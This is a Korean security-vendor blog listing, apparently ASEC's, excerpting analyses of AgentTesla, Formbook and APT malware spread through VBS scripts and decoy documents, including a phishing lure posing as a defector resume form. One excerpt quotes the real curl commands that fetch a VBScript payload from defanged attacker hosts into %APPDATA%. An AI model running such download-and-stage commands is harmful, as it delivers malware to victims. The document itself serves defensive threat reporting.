VBS를 통해 유포 중인 AgentTesla
악성코드

VBS를 통해 유포 중인 AgentTesla

ASEC 분석팀은 최근 악성 VBS 통해 AgentTesla가 유포되고 있음을 확인하였다. 스크립트 파일에는 다수의 코드가 여러 번 난독화 되어 있는 특징이 있다. AgentTesla는 지난 5월 윈도우 도움말 파일(*.chm)을 통한 유포가 확인된 이력이 있으며 지속적으로 유포 방식을 변경하고 있는 것으로 보인다. 윈도우 도움말 파일(*.chm)을 통해 유포 중인 AgentTesla – ASEC BLOG ASEC

  • 10월 25 2022
생일 축하 내용으로 위장한 악성 한글 문서 (OLE 개체)
APT

생일 축하 내용으로 위장한 악성 한글 문서 (OLE 개체)

ASEC 분석팀은 최근 악성 한글 파일을 다운로드 하는 VBScript를 확인하였다. 해당 악성코드의 정확한 유포경로는 확인되지 않았지만 VBScript는 curl을 통해 다운로드 된다. 현재 확인된 명령어는 다음과 같다. curl  -H \”user-agent: chrome/103.0.5060.134 safari/537.32\” hxxp://datkka.atwebpages[.]com/2vbs -o %appdata%\\vbtemp cmd /c cd > %appdata%\\tmp~pth && curl hxxps://datarium.epizy[.]com/2vbs -o %appdata%\\vbtemp 두 명령어 모두 %APPDATA% 폴더에 vbtemp

  • 8월 23 2022
탈북자 이력서 양식을 가장한 APT 공격 (VBS 스크립트)
APT

탈북자 이력서 양식을 가장한 APT 공격 (VBS 스크립트)

  ASEC 분석팀은 최근 대북 관련 내용의 피싱 메일을 통해 정보 유출 목적의 악성 VBS가 유포되고 있음을 확인하였다. 대북 관련 방송의 섭외 내용을 담고 있으며 압축 파일이 첨부되어 있다. 이력서 작성을 언급하여 첨부된 파일의 실행을 유도한다. 압축 파일 내부에는 악성 VBS 스크립트 파일이 존재한다. ‘2022 이력서 양식.vbs’ 파일의 간략한 행위는

  • 3월 29 2022
견적서 위장 악성코드 유포 방식의 변화 (VBS 스크립트)
악성코드

견적서 위장 악성코드 유포 방식의 변화 (VBS 스크립트)

ASEC 분석팀은 지난해 특정 업체의 이름이 포함된 파일명으로 유포된 Formbook 악성코드가 최근 VBS 파일을 통해 유포되고 있음을 확인하였다. 유포가 확인된 메일에는 여전히 견적서 요청 관련 내용을 담고 있으며, 첨부파일명에 특정 회사의 이름이 포함되어 있어 사용자가 첨부파일을 실행하도록 유도한다. 견적서/발주서 제목의 정보유출 악성코드(Formbook) 주의! (21.02.04) 그림1. 이메일1 그림2. 이메일2 메일에 첨부된

  • 2월 22 2022
조치 가이드

마이크로소프트 2012년 8월 보안 패치 배포

마이크로소프트(Microsoft)에서 2012년 7월 한 달 동안 해당 업체에서 개발한 소프트웨어에서 발견된 보안 취약점들을 제거하기 위해...

  • 8월 16 2012